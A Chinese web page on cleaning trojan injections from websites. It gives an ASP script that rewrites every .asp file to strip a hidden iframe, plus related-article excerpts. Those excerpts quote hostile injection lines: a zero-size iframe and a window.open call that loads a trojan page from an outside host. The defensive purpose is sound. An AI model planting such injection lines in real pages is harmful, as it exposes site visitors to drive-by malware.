批量处理网站文件挂马方法与程序

批量处理网站文件挂马方法与程序

很多网站因为种路原因被挂上了木马,我们来讲讲几种比较快的去除网页木马的方法吧,

第一种:用dw直接连接到服务器上查找-替换就OK了.

第二种:在线替换就是把下面的代码保存成一个asp文件,执行就OK了.

<%
Server.ScriptTimeout="600"
call getfile(server.mappath(".\"))
   
              sub   getfile(c_path)  
             set   file_system=createobject("scripting.filesystemobject")  
              set   cur_folder=file_system.getfolder(c_path)      
              set   sub_folders=cur_folder.subfolders  
   
              for   each   each_sub_folder   in   sub_folders  
                      set   sub_files=each_sub_folder.files  
                      for   each   each_file   in   sub_files
            if(lcase(right(each_file.name,3)="asp") then  
                            ReadFile(each_sub_folder&"\"&each_file.name)        '取文件名
            end if
            response.write("已处理&nbsp;&nbsp;"&each_sub_folder&"\"&each_file.name&"<br>")
                response.flush()  
                      next  
                      sub_folder_name=each_sub_folder.name        '目录名  
                      sub_folder_path=c_path&"\"&each_sub_folder.name  
                      call getfile(sub_folder_path)  
              next  
   
              end   sub 
Function ReadFile(filespec)
response.write(filespec)
response.flush()
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set f = fs.OpenTextFile(filespec,1)
      ReadAllTextFile =  f.ReadAll
    Set file1 = fs.CreateTextFile(filespec, True)
content = replace(ReadAllTextFile,"<iframe src=""http://111cn.net"" width=0 height=0></iframe>","")
    file1.WriteLine content
file1.Close
    Set fs = nothing
End Function
%>

时间: 2024-08-30 04:37:37

批量处理网站文件挂马方法与程序的相关文章

常见JS挂马方法及如何防止网站被黑客挂马?

一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro ll

网站被挂马怎么办:排名恢复方法

中介交易 SEO诊断 淘宝客 云主机 技术大厅 网站被攻击和挂马是导致网站排名消失的原因之一,也是最常见的原因.近日,服务器老是被攻击导致网站被挂马,网站排名也随之消失.注意不是下降,是直接从首页掉到100名以后.在这里跟大家分享一下被挂马原因.解决方法和注意事项. 网站被挂马原因解析 网站被挂马一般来说有两方面原因: 1.服务器出现漏洞,被攻击. 2.网站程序存在缺陷被攻击. 一个服务器上可以有上百个甚至上千个网站,所以服务器出问题的概率要远远小于网站.大多数网站被挂马都是网站程序缺陷造成的,

服务器-网站被挂马了,搜遍所有js、php文件,找不到木马文件,可咋整?

问题描述 网站被挂马了,搜遍所有js.php文件,找不到木马文件,可咋整? 已经确定网站被挂马了,用户访问会自动弹出QQ中奖信息 但木马好像会判断ip段,站长这边没有任何现象,用户有反映,有山东.江苏.上海.广东的用户都有反馈 进入服务器,也没有发现文件又被改动的痕迹,没有入侵的痕迹 仔细查看网页包含的js文件,没有发现异常 php文件也没有发现异常 解决方案 如果js和php中未发现木马文件,同时后台有数据库支持,应该检查数据库记录内容,可尝试使用"护卫神"挂马清理工具:http:/

网站javascipt挂马10种方法分析

iframe src=地址 width=0 height=0></iframe> 其中"地址"处可以输入恶意网站链接等 二:js文件挂马 只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等. 三:js变形加密 <SCRIPT language="JScript.Enco

如何有效防止网站被挂马

1 如果使用CMS做站,后台地址一定要改,不要用这个文件夹做你的后台,有些朋友竟然不知道这个后台文件夹可以改名 2 .后台最好加上验证码,虽然麻烦了点,但是可以避免不少的小黑客用社会工程学来破解你的网站(我就试过,很多朋友的密码常常是手机号,域名,qq等等) 3.如果给自己的网站增加了字段(比如要求用户申请时输入生日等等)要过滤,别自己的问题推到了DEDE的头上.(建议有一定PHP技术的朋友去修改,为达到功能不是简单的在前台增加表单后台增加发布表单然后增加数据库字段这么简单,要防止XSS攻击就要

网站被挂马 站长应如何解决

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 网站从创建到现在已经有1年多了,一直运行正常,访问也很稳定,直到昨天一个朋友告诉我说我的网站被挂马了,当时我一听网站挂马我就懵了,不知所措,以前我真的没遇到过,也不知道什么是挂马,在网上搜索了整整3天,终于把网站被挂马给摸透了,我猜很多像我第一次遇到网站被挂马的站长一定也很头疼,不要疼,还有我呢,下面我就给大家谈谈我是怎么解决网站被挂马的!

防止网站被挂马的基本原则

防止网站被挂马的基本原则 1. 服务器安装杀毒软件及专业木马防护软件,及时修补服务器系统漏洞. 2. 网站后台管理用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换. 3. 尽量使用正规的asp 网站管理程序,并修改默认数据库名称和存放路径,数据库文件名不要太简单. 4. 及时更新网站程序,不要在网页上加注后台管理程序登录页面的链接. 5. 时常备份网站整站程序.数据库等,数据库文件不要使用.asp 后缀. 6. 定期检查网站源文件,清除网站程序中来历不明的asp 文件. 7. 一旦发现

网站中毒挂马了怎么清理网站挂马代码

在页面可以看到如 <'IFRAME height=0 src="http://www.xxx.com/1.js" frameBorder=0 width=0 scrolling=no> 这种问题了解决办法 我们可以下载批量替换工具,替换内容留空,文件格式填写*.*,勾选包含子文件夹,若之前没备份,也可以勾选"替换前备份文件*.rpk ". 设置如图: 也可以使用DW软件也替换这里就不介绍了. 关于网站中毒挂马防止办法 网站中毒原因: 很多网站都需要使用到

网站被挂马的怎么办 网站挂马的处理办法

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 做网站已经快3年了,第一次遭遇挂马.可以说是很刺激,但这种刺激似乎不太友好. 新建的网站上线已经4个月了,一直运行正常,访问速度也很快.直至前三天的下午,一个网友加了我网站上的联系QQ,上来就一顿大骂,说我网站竟然放病毒,害的他电脑死机.重启,最后连重启都重启不了了.我当时懵了,还真是不知道怎么回事,就被这劈头盖脸的臭骂一番.我很冷静的回复了